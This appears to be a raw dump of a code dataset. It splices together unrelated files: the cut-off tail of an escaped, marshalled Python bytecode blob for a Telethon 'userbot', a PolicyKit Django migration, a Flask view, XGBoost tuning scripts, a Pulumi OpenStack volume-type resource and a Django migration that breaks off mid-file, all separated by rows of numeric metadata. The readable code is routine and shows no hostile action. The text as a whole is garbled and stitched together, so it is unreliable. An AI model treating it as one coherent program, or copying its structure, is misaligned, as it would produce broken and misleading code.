00\x00\x00Z\x07userbotr\x19\x00\x00\x00r\x1a\x00\x00\x00r\x1b\x00\x00\x00r\x1c\x00\x00\x00Z\x0btelethon.tlr\x1d\x00\x00\x00r\x1e\x00\x00\x00Z\x0euserbot.eventsr\x1f\x00\x00\x00r<\x00\x00\x00r=\x00\x00\x00r3\x00\x00\x00rM\x00\x00\x00ra\x00\x00\x00r;\x00\x00\x00Z\rCHAT_PP_ERRORr9\x00\x00\x00rV\x00\x00\x00r\\\x00\x00\x00rb\x00\x00\x00Z\rUNMUTE_RIGHTSrB\x00\x00\x00rS\x00\x00\x00rT\x00\x00\x00r[\x00\x00\x00r]\x00\x00\x00rc\x00\x00\x00re\x00\x00\x00rj\x00\x00\x00rl\x00\x00\x00rn\x00\x00\x00rw\x00\x00\x00r\x82\x00\x00\x00r\x87\x00\x00\x00r\x8b\x00\x00\x00r\x9b\x00\x00\x00rK\x00\x00\x00r\x84\x00\x00\x00r\xaa\x00\x00\x00r\xab\x00\x00\x00r\xac\x00\x00\x00r\xcd\x00\x00\x00r\xce\x00\x00\x00r\xd8\x00\x00\x00r\xdb\x00\x00\x00r\xdd\x00\x00\x00\xda\x06updater@\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x08<module>\x06\x00\x00\x00s\xce\x00\x00\x00\x04\x04\x0c\x01\x0c\x01\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\x18\x01\x10\x01\x0c\x02\x1c\x03\x10\x02\x14\x03\x0c\x01$\x05\x18\x01\x10\x01\x0c\x03\x04\x01\x04\x01\x04\x01\x04\x01\x04\x02\x04\x01\x04\x03\x04\x02\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xf7\x06\x0c\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xf8\x06\x0b\x0c\x02\x0c\x04\n\x01\n$\n\x01\n1\n\x01\n0\n\x01\n4\n\x01\n$\n\x01\n;\n\x01\n/\x08\x01\n\x1e\n\x01\n*\n\x01\n+\x0c\x01\nG\n\x01\n\x13\n\x01\n,\n\x01\n)\n\x01\n\'\x08%\x08\r\n\x01\n\'\x08%\x08\x0c\n\x01\nW\n\x01\nV\n\x01\n!\n\x01\n\x12\n\x01\n\x1f\n\x01\n\x18\n\x01\n\t\x04\x01\x02\x01\x02\xfe'))
| 14,907.5
| 59,559
| 0.750629
| 12,785
| 59,630
| 3.490418
| 0.09824
| 0.202622
| 0.103261
| 0.071261
| 0.649367
| 0.602443
| 0.562734
| 0.513322
| 0.47702
| 0.441927
| 0
| 0.344641
| 0.013768
| 59,630
| 4
| 59,559
| 14,907.5
| 0.414171
| 0.000872
| 0
| 0
| 0
| 7.5
| 0.450862
| 0.414355
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 11
|
20486bca28bdf6ba8e900010d2f129354d9cb3d7
| 7,271
|
py
|
Python
|
policykit/constitution/migrations/0002_auto_20210909_1512.py
|
mashton/policyk
|
623523d76d63c06b6d559ad7b477d80512fbd2e7
|
[
"MIT"
] | 78
|
2020-05-08T17:25:38.000Z
|
2022-01-13T05:44:50.000Z
|
policykit/constitution/migrations/0002_auto_20210909_1512.py
|
mashton/policyk
|
623523d76d63c06b6d559ad7b477d80512fbd2e7
|
[
"MIT"
] | 302
|
2020-02-20T07:04:30.000Z
|
2022-02-25T17:44:23.000Z
|
policykit/constitution/migrations/0002_auto_20210909_1512.py
|
mashton/policyk
|
623523d76d63c06b6d559ad7b477d80512fbd2e7
|
[
"MIT"
] | 13
|
2020-04-17T19:44:26.000Z
|
2022-02-25T17:18:04.000Z
|
# Generated by Django 3.2.2 on 2021-09-09 15:12
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('constitution', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='policykitaddconstitutionpolicy',
name='check',
field=models.TextField(blank=True, verbose_name='Check'),
),
migrations.AlterField(
model_name='policykitaddconstitutionpolicy',
name='fail',
field=models.TextField(blank=True, verbose_name='Fail'),
),
migrations.AlterField(
model_name='policykitaddconstitutionpolicy',
name='filter',
field=models.TextField(blank=True, verbose_name='Filter'),
),
migrations.AlterField(
model_name='policykitaddconstitutionpolicy',
name='initialize',
field=models.TextField(blank=True, verbose_name='Initialize'),
),
migrations.AlterField(
model_name='policykitaddconstitutionpolicy',
name='notify',
field=models.TextField(blank=True, verbose_name='Notify'),
),
migrations.AlterField(
model_name='policykitaddconstitutionpolicy',
name='success',
field=models.TextField(blank=True, verbose_name='Pass'),
),
migrations.AlterField(
model_name='policykitaddplatformpolicy',
name='check',
field=models.TextField(blank=True, verbose_name='Check'),
),
migrations.AlterField(
model_name='policykitaddplatformpolicy',
name='fail',
field=models.TextField(blank=True, verbose_name='Fail'),
),
migrations.AlterField(
model_name='policykitaddplatformpolicy',
name='filter',
field=models.TextField(blank=True, verbose_name='Filter'),
),
migrations.AlterField(
model_name='policykitaddplatformpolicy',
name='initialize',
field=models.TextField(blank=True, verbose_name='Initialize'),
),
migrations.AlterField(
model_name='policykitaddplatformpolicy',
name='notify',
field=models.TextField(blank=True, verbose_name='Notify'),
),
migrations.AlterField(
model_name='policykitaddplatformpolicy',
name='success',
field=models.TextField(blank=True, verbose_name='Pass'),
),
migrations.AlterField(
model_name='policykitaddtriggerpolicy',
name='check',
field=models.TextField(blank=True, verbose_name='Check'),
),
migrations.AlterField(
model_name='policykitaddtriggerpolicy',
name='fail',
field=models.TextField(blank=True, verbose_name='Fail'),
),
migrations.AlterField(
model_name='policykitaddtriggerpolicy',
name='filter',
field=models.TextField(blank=True, verbose_name='Filter'),
),
migrations.AlterField(
model_name='policykitaddtriggerpolicy',
name='initialize',
field=models.TextField(blank=True, verbose_name='Initialize'),
),
migrations.AlterField(
model_name='policykitaddtriggerpolicy',
name='notify',
field=models.TextField(blank=True, verbose_name='Notify'),
),
migrations.AlterField(
model_name='policykitaddtriggerpolicy',
name='success',
field=models.TextField(blank=True, verbose_name='Pass'),
),
migrations.AlterField(
model_name='policykitchangeconstitutionpolicy',
name='check',
field=models.TextField(blank=True, verbose_name='Check'),
),
migrations.AlterField(
model_name='policykitchangeconstitutionpolicy',
name='fail',
field=models.TextField(blank=True, verbose_name='Fail'),
),
migrations.AlterField(
model_name='policykitchangeconstitutionpolicy',
name='filter',
field=models.TextField(blank=True, verbose_name='Filter'),
),
migrations.AlterField(
model_name='policykitchangeconstitutionpolicy',
name='initialize',
field=models.TextField(blank=True, verbose_name='Initialize'),
),
migrations.AlterField(
model_name='policykitchangeconstitutionpolicy',
name='notify',
field=models.TextField(blank=True, verbose_name='Notify'),
),
migrations.AlterField(
model_name='policykitchangeconstitutionpolicy',
name='success',
field=models.TextField(blank=True, verbose_name='Pass'),
),
migrations.AlterField(
model_name='policykitchangeplatformpolicy',
name='check',
field=models.TextField(blank=True, verbose_name='Check'),
),
migrations.AlterField(
model_name='policykitchangeplatformpolicy',
name='fail',
field=models.TextField(blank=True, verbose_name='Fail'),
),
migrations.AlterField(
model_name='policykitchangeplatformpolicy',
name='filter',
field=models.TextField(blank=True, verbose_name='Filter'),
),
migrations.AlterField(
model_name='policykitchangeplatformpolicy',
name='initialize',
field=models.TextField(blank=True, verbose_name='Initialize'),
),
migrations.AlterField(
model_name='policykitchangeplatformpolicy',
name='notify',
field=models.TextField(blank=True, verbose_name='Notify'),
),
migrations.AlterField(
model_name='policykitchangeplatformpolicy',
name='success',
field=models.TextField(blank=True, verbose_name='Pass'),
),
migrations.AlterField(
model_name='policykitchangetriggerpolicy',
name='check',
field=models.TextField(blank=True, verbose_name='Check'),
),
migrations.AlterField(
model_name='policykitchangetriggerpolicy',
name='fail',
field=models.TextField(blank=True, verbose_name='Fail'),
),
migrations.AlterField(
model_name='policykitchangetriggerpolicy',
name='filter',
field=models.TextField(blank=True, verbose_name='Filter'),
),
migrations.AlterField(
model_name='policykitchangetriggerpolicy',
name='initialize',
field=models.TextField(blank=True, verbose_name='Initialize'),
),
migrations.AlterField(
model_name='policykitchangetriggerpolicy',
name='notify',
field=models.TextField(blank=True, verbose_name='Notify'),
),
migrations.AlterField(
model_name='policykitchangetriggerpolicy',
name='success',
field=models.TextField(blank=True, verbose_name='Pass'),
),
]
| 37.479381
| 74
| 0.592903
| 567
| 7,271
| 7.474427
| 0.075838
| 0.169891
| 0.212364
| 0.246343
| 0.96555
| 0.96555
| 0.716612
| 0.716612
| 0.716612
| 0.716612
| 0
| 0.003704
| 0.294595
| 7,271
| 193
| 75
| 37.673575
| 0.822578
| 0.006189
| 0
| 0.962567
| 1
| 0
| 0.20598
| 0.142027
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.032086
| 0.005348
| 0
| 0.02139
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
204be9a386fb0960de9606f234662254ea194ccd
| 167
|
py
|
Python
|
app/views/index.py
|
aluisq/flask_mysql_jinja
|
6fc9bd23ac31647744be0a1016bca42e2bc32961
|
[
"MIT"
] | null | null | null |
app/views/index.py
|
aluisq/flask_mysql_jinja
|
6fc9bd23ac31647744be0a1016bca42e2bc32961
|
[
"MIT"
] | null | null | null |
app/views/index.py
|
aluisq/flask_mysql_jinja
|
6fc9bd23ac31647744be0a1016bca42e2bc32961
|
[
"MIT"
] | null | null | null |
from app import cursor, app
from flask import render_template, request, redirect, url_for
@app.route("/")
def index():
return render_template('public/index.html')
| 27.833333
| 61
| 0.754491
| 24
| 167
| 5.125
| 0.708333
| 0.227642
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125749
| 167
| 6
| 62
| 27.833333
| 0.842466
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
64ceb5e5c87167c39b8afcdd2cceb598e3a35691
| 3,207
|
py
|
Python
|
examples/classification_iris/classification_xgb_iris.py
|
c60evaporator/param-tuning-utility
|
80625f875428badac37d8439195a9327a565b040
|
[
"BSD-3-Clause"
] | null | null | null |
examples/classification_iris/classification_xgb_iris.py
|
c60evaporator/param-tuning-utility
|
80625f875428badac37d8439195a9327a565b040
|
[
"BSD-3-Clause"
] | null | null | null |
examples/classification_iris/classification_xgb_iris.py
|
c60evaporator/param-tuning-utility
|
80625f875428badac37d8439195a9327a565b040
|
[
"BSD-3-Clause"
] | 1
|
2022-01-06T05:13:07.000Z
|
2022-01-06T05:13:07.000Z
|
# %% XGBClassifier, GridSearch, no argument
import parent_import
from tune_easy import XGBClassifierTuning
from sklearn.model_selection import KFold
import seaborn as sns
# Load dataset
iris = sns.load_dataset("iris")
TARGET_VARIALBLE = 'species' # Target variable
USE_EXPLANATORY = ['petal_width', 'petal_length', 'sepal_width', 'sepal_length'] # Explanatory variables
y = iris[TARGET_VARIALBLE].values
X = iris[USE_EXPLANATORY].values
# Run parameter tuning
tuning = XGBClassifierTuning(X, y, USE_EXPLANATORY, y_colname=TARGET_VARIALBLE)
tuning.plot_first_validation_curve(cv=KFold(n_splits=3, shuffle=True, random_state=42))
tuning.grid_search_tuning(cv=KFold(n_splits=3, shuffle=True, random_state=42))
tuning.plot_search_history()
tuning.plot_search_map()
tuning.plot_best_learning_curve()
tuning.plot_best_validation_curve()
tuning.plot_param_importances()
# %% XGBClassifier, RandomSearch, no argument
import parent_import
from tune_easy import XGBClassifierTuning
from sklearn.model_selection import KFold
import seaborn as sns
# Load dataset
iris = sns.load_dataset("iris")
TARGET_VARIALBLE = 'species' # Target variable
USE_EXPLANATORY = ['petal_width', 'petal_length', 'sepal_width', 'sepal_length'] # Explanatory variables
y = iris[TARGET_VARIALBLE].values
X = iris[USE_EXPLANATORY].values
# Run parameter tuning
tuning = XGBClassifierTuning(X, y, USE_EXPLANATORY, y_colname=TARGET_VARIALBLE)
tuning.random_search_tuning(cv=KFold(n_splits=3, shuffle=True, random_state=42))
tuning.plot_search_history()
tuning.plot_search_map()
tuning.plot_best_learning_curve()
tuning.plot_best_validation_curve()
tuning.plot_param_importances()
# %% XGBClassifier, BayesianOptimization, no argument
import parent_import
from tune_easy import XGBClassifierTuning
from sklearn.model_selection import KFold
import seaborn as sns
# Load dataset
iris = sns.load_dataset("iris")
TARGET_VARIALBLE = 'species' # Target variable
USE_EXPLANATORY = ['petal_width', 'petal_length', 'sepal_width', 'sepal_length'] # Explanatory variables
y = iris[TARGET_VARIALBLE].values
X = iris[USE_EXPLANATORY].values
# Run parameter tuning
tuning = XGBClassifierTuning(X, y, USE_EXPLANATORY, y_colname=TARGET_VARIALBLE)
tuning.bayes_opt_tuning(cv=KFold(n_splits=3, shuffle=True, random_state=42))
tuning.plot_search_history()
tuning.plot_search_map()
tuning.plot_best_learning_curve()
tuning.plot_best_validation_curve()
tuning.plot_param_importances()
# %% XGBClassifier, Optuna, no argument
import parent_import
from tune_easy import XGBClassifierTuning
import seaborn as sns
from sklearn.model_selection import KFold
# Load dataset
iris = sns.load_dataset("iris")
TARGET_VARIALBLE = 'species' # Target variable
USE_EXPLANATORY = ['petal_width', 'petal_length', 'sepal_width', 'sepal_length'] # Explanatory variables
y = iris[TARGET_VARIALBLE].values
X = iris[USE_EXPLANATORY].values
# Run parameter tuning
tuning = XGBClassifierTuning(X, y, USE_EXPLANATORY, y_colname=TARGET_VARIALBLE)
tuning.optuna_tuning(cv=KFold(n_splits=3, shuffle=True, random_state=42))
tuning.plot_search_history()
tuning.plot_search_map()
tuning.plot_best_learning_curve()
tuning.plot_best_validation_curve()
tuning.plot_param_importances()
# %%
| 39.109756
| 105
| 0.817275
| 434
| 3,207
| 5.74424
| 0.147465
| 0.084236
| 0.048135
| 0.050542
| 0.949057
| 0.949057
| 0.934617
| 0.934617
| 0.934617
| 0.934617
| 0
| 0.005118
| 0.086062
| 3,207
| 81
| 106
| 39.592593
| 0.845445
| 0.145307
| 0
| 0.923077
| 0
| 0
| 0.083854
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.307692
| 0
| 0.307692
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
b3b8e0750f59d4a269e55ec3576828783e7ee68d
| 16,837
|
py
|
Python
|
sdk/python/pulumi_openstack/blockstorage/volume_type_v3.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 34
|
2018-09-12T12:37:51.000Z
|
2022-02-04T19:32:13.000Z
|
sdk/python/pulumi_openstack/blockstorage/volume_type_v3.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 72
|
2018-08-15T13:04:57.000Z
|
2022-03-31T15:39:49.000Z
|
sdk/python/pulumi_openstack/blockstorage/volume_type_v3.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 7
|
2019-03-14T08:28:49.000Z
|
2021-12-29T04:23:55.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['VolumeTypeV3Args', 'VolumeTypeV3']
@pulumi.input_type
class VolumeTypeV3Args:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
extra_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a VolumeTypeV3 resource.
:param pulumi.Input[str] description: Human-readable description of the port. Changing
this updates the `description` of an existing volume type.
:param pulumi.Input[Mapping[str, Any]] extra_specs: Key/Value pairs of metadata for the volume type.
:param pulumi.Input[bool] is_public: Whether the volume type is public. Changing
this updates the `is_public` of an existing volume type.
:param pulumi.Input[str] name: Name of the volume type. Changing this
updates the `name` of an existing volume type.
:param pulumi.Input[str] region: The region in which to create the volume. If
omitted, the `region` argument of the provider is used. Changing this
creates a new quotaset.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if extra_specs is not None:
pulumi.set(__self__, "extra_specs", extra_specs)
if is_public is not None:
pulumi.set(__self__, "is_public", is_public)
if name is not None:
pulumi.set(__self__, "name", name)
if region is not None:
pulumi.set(__self__, "region", region)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Human-readable description of the port. Changing
this updates the `description` of an existing volume type.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="extraSpecs")
def extra_specs(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Key/Value pairs of metadata for the volume type.
"""
return pulumi.get(self, "extra_specs")
@extra_specs.setter
def extra_specs(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "extra_specs", value)
@property
@pulumi.getter(name="isPublic")
def is_public(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the volume type is public. Changing
this updates the `is_public` of an existing volume type.
"""
return pulumi.get(self, "is_public")
@is_public.setter
def is_public(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_public", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the volume type. Changing this
updates the `name` of an existing volume type.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region in which to create the volume. If
omitted, the `region` argument of the provider is used. Changing this
creates a new quotaset.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@pulumi.input_type
class _VolumeTypeV3State:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
extra_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering VolumeTypeV3 resources.
:param pulumi.Input[str] description: Human-readable description of the port. Changing
this updates the `description` of an existing volume type.
:param pulumi.Input[Mapping[str, Any]] extra_specs: Key/Value pairs of metadata for the volume type.
:param pulumi.Input[bool] is_public: Whether the volume type is public. Changing
this updates the `is_public` of an existing volume type.
:param pulumi.Input[str] name: Name of the volume type. Changing this
updates the `name` of an existing volume type.
:param pulumi.Input[str] region: The region in which to create the volume. If
omitted, the `region` argument of the provider is used. Changing this
creates a new quotaset.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if extra_specs is not None:
pulumi.set(__self__, "extra_specs", extra_specs)
if is_public is not None:
pulumi.set(__self__, "is_public", is_public)
if name is not None:
pulumi.set(__self__, "name", name)
if region is not None:
pulumi.set(__self__, "region", region)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Human-readable description of the port. Changing
this updates the `description` of an existing volume type.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="extraSpecs")
def extra_specs(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Key/Value pairs of metadata for the volume type.
"""
return pulumi.get(self, "extra_specs")
@extra_specs.setter
def extra_specs(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "extra_specs", value)
@property
@pulumi.getter(name="isPublic")
def is_public(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the volume type is public. Changing
this updates the `is_public` of an existing volume type.
"""
return pulumi.get(self, "is_public")
@is_public.setter
def is_public(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_public", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the volume type. Changing this
updates the `name` of an existing volume type.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region in which to create the volume. If
omitted, the `region` argument of the provider is used. Changing this
creates a new quotaset.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
class VolumeTypeV3(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
extra_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a V3 block storage volume type resource within OpenStack.
> **Note:** This usually requires admin privileges.
## Example Usage
```python
import pulumi
import pulumi_openstack as openstack
volume_type1 = openstack.blockstorage.VolumeTypeV3("volumeType1",
description="Volume type 1",
extra_specs={
"capabilities": "gpu",
"volume_backend_name": "ssd",
})
```
## Import
Volume types can be imported using the `volume_type_id`, e.g.
```sh
$ pulumi import openstack:blockstorage/volumeTypeV3:VolumeTypeV3 volume_type_1 941793f0-0a34-4bc4-b72e-a6326ae58283
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: Human-readable description of the port. Changing
this updates the `description` of an existing volume type.
:param pulumi.Input[Mapping[str, Any]] extra_specs: Key/Value pairs of metadata for the volume type.
:param pulumi.Input[bool] is_public: Whether the volume type is public. Changing
this updates the `is_public` of an existing volume type.
:param pulumi.Input[str] name: Name of the volume type. Changing this
updates the `name` of an existing volume type.
:param pulumi.Input[str] region: The region in which to create the volume. If
omitted, the `region` argument of the provider is used. Changing this
creates a new quotaset.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[VolumeTypeV3Args] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a V3 block storage volume type resource within OpenStack.
> **Note:** This usually requires admin privileges.
## Example Usage
```python
import pulumi
import pulumi_openstack as openstack
volume_type1 = openstack.blockstorage.VolumeTypeV3("volumeType1",
description="Volume type 1",
extra_specs={
"capabilities": "gpu",
"volume_backend_name": "ssd",
})
```
## Import
Volume types can be imported using the `volume_type_id`, e.g.
```sh
$ pulumi import openstack:blockstorage/volumeTypeV3:VolumeTypeV3 volume_type_1 941793f0-0a34-4bc4-b72e-a6326ae58283
```
:param str resource_name: The name of the resource.
:param VolumeTypeV3Args args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(VolumeTypeV3Args, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
extra_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = VolumeTypeV3Args.__new__(VolumeTypeV3Args)
__props__.__dict__["description"] = description
__props__.__dict__["extra_specs"] = extra_specs
__props__.__dict__["is_public"] = is_public
__props__.__dict__["name"] = name
__props__.__dict__["region"] = region
super(VolumeTypeV3, __self__).__init__(
'openstack:blockstorage/volumeTypeV3:VolumeTypeV3',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
extra_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_public: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None) -> 'VolumeTypeV3':
"""
Get an existing VolumeTypeV3 resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: Human-readable description of the port. Changing
this updates the `description` of an existing volume type.
:param pulumi.Input[Mapping[str, Any]] extra_specs: Key/Value pairs of metadata for the volume type.
:param pulumi.Input[bool] is_public: Whether the volume type is public. Changing
this updates the `is_public` of an existing volume type.
:param pulumi.Input[str] name: Name of the volume type. Changing this
updates the `name` of an existing volume type.
:param pulumi.Input[str] region: The region in which to create the volume. If
omitted, the `region` argument of the provider is used. Changing this
creates a new quotaset.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _VolumeTypeV3State.__new__(_VolumeTypeV3State)
__props__.__dict__["description"] = description
__props__.__dict__["extra_specs"] = extra_specs
__props__.__dict__["is_public"] = is_public
__props__.__dict__["name"] = name
__props__.__dict__["region"] = region
return VolumeTypeV3(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
Human-readable description of the port. Changing
this updates the `description` of an existing volume type.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="extraSpecs")
def extra_specs(self) -> pulumi.Output[Mapping[str, Any]]:
"""
Key/Value pairs of metadata for the volume type.
"""
return pulumi.get(self, "extra_specs")
@property
@pulumi.getter(name="isPublic")
def is_public(self) -> pulumi.Output[bool]:
"""
Whether the volume type is public. Changing
this updates the `is_public` of an existing volume type.
"""
return pulumi.get(self, "is_public")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the volume type. Changing this
updates the `name` of an existing volume type.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
"""
The region in which to create the volume. If
omitted, the `region` argument of the provider is used. Changing this
creates a new quotaset.
"""
return pulumi.get(self, "region")
| 40.183771
| 134
| 0.62422
| 1,969
| 16,837
| 5.158964
| 0.089893
| 0.074719
| 0.08417
| 0.058476
| 0.838452
| 0.824769
| 0.814727
| 0.80695
| 0.80193
| 0.792282
| 0
| 0.006828
| 0.278078
| 16,837
| 418
| 135
| 40.279904
| 0.828877
| 0.384095
| 0
| 0.777228
| 1
| 0
| 0.07323
| 0.005262
| 0
| 0
| 0
| 0
| 0
| 1
| 0.158416
| false
| 0.004951
| 0.024752
| 0
| 0.277228
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b3ee32b9bdbb47c6d99df9592416ba39bf94cfdd
| 41,169
|
py
|
Python
|
upload/migrations/0001_initial.py
|
shubhi-raft/TANF-app
|
f07a4292a3dd208378014935366eafd138d28ace
|
[
"CC0-1.0"
] | 1
|
2020-05-08T19:55:07.000Z
|
2020-05-08T19:55:07.000Z
|
upload/migrations/0001_initial.py
|
shubhi-raft/TANF-app
|
f07a4292a3dd208378014935366eafd138d28ace
|
[
"CC0-1.0"
] | 4
|
2021-04-08T19:55:25.000Z
|
2021-06-10T20:16:46.000Z
|
upload/migrations/0001_initial.py
|
shubhi-raft/TANF-app
|
f07a4292a3dd208378014935366eafd138d28ace
|
[
"CC0-1.0"
] | 1
|
2021-02-04T11:09:44.000Z
|
2021-02-04T11:09:44.000Z
|
# Generated by Django 2.2.7 on 2019-12-10 23:13
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Adult',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
